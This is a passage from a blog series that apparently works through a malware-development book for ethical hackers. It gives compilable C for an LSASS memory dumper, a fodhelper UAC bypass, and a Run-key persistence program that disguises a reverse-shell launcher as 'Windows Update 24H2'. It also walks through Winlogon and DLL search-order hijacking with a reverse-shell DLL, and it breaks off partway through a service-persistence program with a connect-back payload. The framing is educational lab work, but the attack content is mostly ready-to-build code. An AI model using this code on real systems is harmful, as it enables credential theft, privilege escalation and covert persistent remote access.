</span><span class="k">return</span><span class="w"> </span><span class="n">winlogonPID</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// set privilege</span> <span class="n">BOOL</span><span class="w"> </span><span class="nf">setPrivilege</span><span class="p">(</span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">priv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">token</span><span class="p">;</span> <span class="w"> </span><span class="n">TOKEN_PRIVILEGES</span><span class="w"> </span><span class="n">tp</span><span class="p">;</span> <span class="w"> </span><span class="n">LUID</span><span class="w"> </span><span class="n">luid</span><span class="p">;</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// takes the name of the privilege from arg and attempts to find it in system</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-lookupprivilegevaluew </span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">LookupPrivilegeValue</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">priv</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">luid</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// attempt to open the proc token with the ability to adjust privs</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">OpenProcessToken</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="n">TOKEN_ADJUST_PRIVILEGES</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">token</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// create a new token priv object and enable the privilege</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">PrivilegeCount</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">Privileges</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Luid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">luid</span><span class="p">;</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">Privileges</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Attributes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SE_PRIVILEGE_ENABLED</span><span class="p">;</span> <span class="w"> </span><span class="c1">// use the token priv object to enable the privilege</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">AdjustTokenPrivileges</span><span class="p">(</span><span class="n">token</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">tp</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">TOKEN_PRIVILEGES</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="n">PTOKEN_PRIVILEGES</span><span class="p">)</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">PDWORD</span><span class="p">)</span><span class="nb">NULL</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// cleanup</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">token</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"privilege enabled %s</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to enable privilege %s </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">priv</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">res</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// create minidump of lsass.exe</span> <span class="n">BOOL</span><span class="w"> </span><span class="nf">generateMiniDump</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">dumpSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">processID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">findProcess</span><span class="p">(</span><span class="n">targetProcess</span><span class="p">);</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">processHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_VM_READ</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">PROCESS_QUERY_INFORMATION</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">processID</span><span class="p">);</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">outputHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateFileW</span><span class="p">(</span><span class="n">dumpFile</span><span class="p">,</span><span class="w"> </span><span class="n">GENERIC_ALL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">CREATE_ALWAYS</span><span class="p">,</span><span class="w"> </span><span class="n">FILE_ATTRIBUTE_NORMAL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">processHandle</span><span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span><span class="n">outputHandle</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// dump proc with mem</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump</span> <span class="w"> </span><span class="n">dumpSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MiniDumpWriteDump</span><span class="p">(</span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="n">processID</span><span class="p">,</span><span class="w"> </span><span class="n">outputHandle</span><span class="p">,</span><span class="w"> </span><span class="n">MiniDumpWithFullMemory</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">dumpSuccess</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"successfully dumped to lsass.dmp</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to dump</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span> <span class="w"> </span><span class="c1">// error handle if the process is not found or an error in dumping the process</span> <span class="w"> </span><span class="k">else</span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">processHandle</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Error: Unable to open process with ID %lu. Error code: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">processID</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">outputHandle</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Error: Unable to create dump file. Error code: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">dumpSuccess</span><span class="p">;</span><span class="w"> </span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">setPrivilege</span><span class="p">(</span><span class="n">SE_DEBUG_NAME</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">generateMiniDump</span><span class="p">())</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h1 id="dll-search-order-hijacking">DLL Search Order Hijacking</h1> <p>This tactic seems to come up frequently, it also appeared in chapters 1 and 3. You can find my code where I previously used this exploit in the chapter 03 blog post, <a href="https://blog.ericturner.local/2025/01/21/malware-dev-chapter-03-persistence/#DLL_Search_Order_Hijacking">here</a>.</p> <p>The only thing different about this particular approach is that we attempt to find an application that runs as <code>NT Authority\System</code>. Once one is found, we perform the same trick as before, where a DLL is replaced with our malicious DLL. It will then inherit the permissions of the account when our reverse shell is granted. The book uses <code>Discord.exe</code>, which appears to use system privileges when running (for whatever reason).</p> <h1 id="circumventing-uac">Circumventing UAC</h1> <h2 id="fodhelperexe">fodhelper.exe</h2> <p>This executable, found under <code>C:\Windows\System32\fodhelper.exe</code> is utilized to help manage Optional Features in Windows. Booting the application up launches the Settings &gt; System &gt; Optional Features pane.</p> <p>Using <code>sigcheck.exe -a -m c:\\windows\\system32\\fodhelper.exe</code> on my Flare-VM Windows10 vm, it launches the SysInternal's SigCheck utility. The manifest provides details that execution of this application requires admin privileges: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-56.webp"/></p> <p>Using procmon, we can monitor what registry values the executable attempts to query. The book showcases a <code>\Shell\Open\command</code> registry key that does not actually exist: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-55.webp"/></p> <p>registry key that does not exist</p> <p>By creating a registry key here to spawn a command shell, it can spawn with elevated privileges.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> PrivEsc - Token Theft</span> <span class="cm"> 25 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 04_uac_bypass.c -o tetris.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HKEY</span><span class="w"> </span><span class="n">registryKey</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">disposition</span><span class="p">;</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">registryPath</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"Software</span><span class="se">\\</span><span class="s">Classes</span><span class="se">\\</span><span class="s">ms-settings</span><span class="se">\\</span><span class="s">Shell</span><span class="se">\\</span><span class="s">Open</span><span class="se">\\</span><span class="s">command"</span><span class="p">;</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">command</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"cmd /c start C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">cmd.exe"</span><span class="p">;</span><span class="w"> </span><span class="c1">// default program</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">delegateExecute</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">""</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Attempt to open the registry key</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexw</span> <span class="w"> </span><span class="c1">// disposition is set but never seems to be read from or used</span> <span class="w"> </span><span class="n">LSTATUS</span><span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegCreateKeyEx</span><span class="p">(</span><span class="n">HKEY_CURRENT_USER</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="n">registryPath</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">KEY_WRITE</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">registryKey</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">disposition</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">status</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"Failed to open or create the registry key.</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"Successfully created the registry key.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// sets the default value to our command</span> <span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegSetValueEx</span><span class="p">(</span><span class="n">registryKey</span><span class="p">,</span><span class="w"> </span><span class="s">""</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">REG_SZ</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">command</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">command</span><span class="p">));</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">status</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"Failed to set the registry value.</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"Successfully set the registry value.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// creates a DelegateExecute value set to null</span> <span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegSetValueEx</span><span class="p">(</span><span class="n">registryKey</span><span class="p">,</span><span class="w"> </span><span class="s">"DelegateExecute"</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">REG_SZ</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">delegateExecute</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">delegateExecute</span><span class="p">));</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">status</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"Failed to set the registry value: DelegateExecute.</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"Successfully set the registry value: DelegateExecute.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Close the registry key handle</span> <span class="w"> </span><span class="n">RegCloseKey</span><span class="p">(</span><span class="n">registryKey</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Start the fodhelper.exe program</span> <span class="w"> </span><span class="n">SHELLEXECUTEINFO</span><span class="w"> </span><span class="n">shellExecuteInfo</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">shellExecuteInfo</span><span class="p">)</span><span class="w"> </span><span class="p">};</span> <span class="w"> </span><span class="n">shellExecuteInfo</span><span class="p">.</span><span class="n">lpVerb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"runas"</span><span class="p">;</span> <span class="w"> </span><span class="n">shellExecuteInfo</span><span class="p">.</span><span class="n">lpFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">fodhelper.exe"</span><span class="p">;</span> <span class="w"> </span><span class="n">shellExecuteInfo</span><span class="p">.</span><span class="n">hwnd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">shellExecuteInfo</span><span class="p">.</span><span class="n">nShow</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SW_NORMAL</span><span class="p">;</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ShellExecuteEx</span><span class="p">(</span><span class="o">&amp;</span><span class="n">shellExecuteInfo</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">error</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">();</span> <span class="w"> </span><span class="n">printf</span><span class="w"> </span><span class="p">(</span><span class="n">error</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">ERROR_CANCELLED</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"The user refused to allow privilege elevation.</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"Unexpected error! Error code: %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">error</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Successfully created the process</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>Per <a href="https://redfoxsec.com/blog/windows-uac-bypass/">this blogpost</a>, if Windows Defender is enabled, the modification of the registry for UAC is flagged as <code>Win32/UACBypassExp</code> and can be removed. The author appeared to be on a Win10 1903 build. I am currently on 22H2, 1904.3803. I tried a few methods for this, it does write the command to the registry, but the command window that spawns is still non-privileged. Changing the command to <code>cmd /c powershell.exe</code> further confirms the full command does not seem to run, it spawns the <code>cmd.exe</code> but <code>powershell.exe</code> never boots. Will have to do more investigation into if this was finally patched. Most articles about this exploit are a few years old.</p>2025-01-21T00:34:05-05:002025-01-21T00:34:05-05:00Eric Turnertag:blog.ericturner.it,2025-01-21:/2025/01/21/malware-dev-chapter-03-persistence/

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo: <a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 - Malware_Development</a>.</p> <p>This chapter contains methods to achieve persistence of malware in Windows.</p> <h1 id="registry-keys">Registry Keys</h1> <h2 id="run-registry-key">Run Registry Key</h2> <p>The book utilizes a dummy code to pop up a message window using the registry persistence. I re-used my reverse …</p>

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo: <a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 - Malware_Development</a>.</p> <p>This chapter contains methods to achieve persistence of malware in Windows.</p> <h1 id="registry-keys">Registry Keys</h1> <h2 id="run-registry-key">Run Registry Key</h2> <p>The book utilizes a dummy code to pop up a message window using the registry persistence. I re-used my reverse shell windows code from chapter 1, cleverly named Update.exe. In my version, I named the new application StartUpdate.exe for persistence. This requires the reverse shell executable to be in <code>C:\\Update.exe</code>. Once StartUpdate.exe is ran, it appears that nothing occurred. Once the system is rebooted or the user logs out and back in, <code>Update.exe</code> fires and the reverse shell is granted:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-48.webp"/></p> <p>Top: Windows machine showing Update.exe and the new registry key.<br/> Bottom: Reverse shell connection successful</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Persistence - Run</span> <span class="cm"> 20 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 03_registry_persist.c -o StartUpdate.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(){</span> <span class="w"> </span><span class="n">HKEY</span><span class="w"> </span><span class="n">hkey</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="c1">// path to executable</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">exe</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"C:</span><span class="se">\\</span><span class="s">Update.exe"</span><span class="p">;</span> <span class="w"> </span><span class="c1">//open startup reg key, save into hkey</span> <span class="w"> </span><span class="n">LONG</span><span class="w"> </span><span class="n">result</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegOpenKeyEx</span><span class="p">(</span><span class="n">HKEY_CURRENT_USER</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="s">"SOFTWARE</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">CurrentVersion</span><span class="se">\\</span><span class="s">Run"</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">KEY_WRITE</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">hkey</span><span class="p">);</span> <span class="w"> </span><span class="c1">// check for success</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">result</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="p">){</span> <span class="w"> </span><span class="c1">// create key for persistence</span> <span class="w"> </span><span class="n">RegSetValueEx</span><span class="p">(</span><span class="n">hkey</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="s">"Windows Update 24H2"</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">REG_SZ</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">exe</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">exe</span><span class="p">));</span> <span class="w"> </span><span class="n">RegCloseKey</span><span class="p">(</span><span class="n">hkey</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h2 id="winlogon-registry-key">Winlogon Registry Key</h2> <p>A different tactic is updating the Winlogon registry key. In this variation, we append the name of our malicious executable to the existing value <code>explorer.exe</code>.</p> <p>The code is almost the same as the above, with the exception of the key being opened is <code>SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon</code>, and the value we are modifying is <code>Shell</code>. The malicious <code>C:\\Update.exe</code> gets relocated to <code>C:\\Windows\\System32\\update.exe</code>. I compiled the code to <code>UpdateLogon.exe</code> and executed it on the Windows VM. After a simple reboot, the <code>update.exe</code> launches almost immediately and the reverse shell connects in our linux shell.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-49.webp"/></p> <h1 id="dll-search-order-hijacking_1">DLL Search Order Hijacking</h1> <p>This is a fascinating one to me. Using Process Monitor (procmon), set up a filter system for the target application, in this instance Internet Explorer (iexplore.exe). Look for any instances where the executable searches for a DLL and it is not found. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-50.webp"/></p> <p>Process Monitor filter</p> <p>Apply the filter and then launch the target application.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-51.webp"/></p> <p>Process Monitor filter results</p> <p>As the application starts, all of the DLLs the application tries to load show up here. In this instance, none of them exist. Fortunately, all of these also exist inside of the application's directory, instead of system DLLs that could be found in someplace such as C:\\Windows\\System32.</p> <p>A malicious DLL can be created with the name of one of the above not found DLLs. Thus, when the target application is launched again, it will fire the malicious DLL.</p> <p>I reused the same DLL I used from the last chapter; <a href="https://github.com/EricTurner3/cybersecurity/blob/main/Malware_Development/02_dll.c">my custom made reverse-shell DLL</a>. I renamed this file <code>suspend.dll</code> and placed in the Internet Explorer root directory. Internet Explorer is no longer supported, and launching this application just quickly launches Microsoft Edge. However, the launch is still enough to attach our DLL and link our reverse shell.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-52.webp"/></p> <p>A malicious suspend.dll that triggers a reverse shell</p> <h1 id="windows-service">Windows Service</h1> <p>The example in the book performs another two-stage attack. <code>msfvenom</code> is used to create the reverse tcp payload and saved to an executable. Then, a second program is created to essentially set the msfvenom payload as a service.</p> <p>Instead, we have already used a TCP reverse listener in C from prior exercises. I combined the logic in order to have a single executable that is able to register itself as a tcp listener.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Persistence - Service</span> <span class="cm"> 20 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 03_service_persist.c -o StartUpdate.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> //for printf</span> <span class="cp">#define SLEEP_TIME 5000</span> <span class="c1">// payload to connect back to 10.0.3.4:4444</span> <span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">payload</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"..."</span><span class="p">;</span> <span class="kt">size_t</span><span class="w"> </span><span class="n">payload_size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span> <span class="n">SERVICE_STATUS</span><span class="w"> </span><span class="n">serviceStatus</span><span class="p">;</span> <span class="n">SERVICE_STATUS_HANDLE</span><span class="w"> </span><span class="n">hStatus</span><span class="p">;</span> <span class="kt">void</span><span class="w"> </span><span class="nf">ServiceMain</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">);</span> <span class="kt">void</span><span class="w"> </span><span 